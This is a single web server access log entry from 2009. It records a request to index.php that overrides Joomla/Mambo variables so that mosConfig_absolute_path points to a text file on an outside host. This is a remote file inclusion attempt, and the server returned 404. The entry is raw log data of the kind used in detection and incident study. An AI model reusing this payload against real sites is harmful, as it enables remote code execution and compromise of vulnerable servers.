94.102.6.154 - - [28/Sep/2009:02:52:28 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
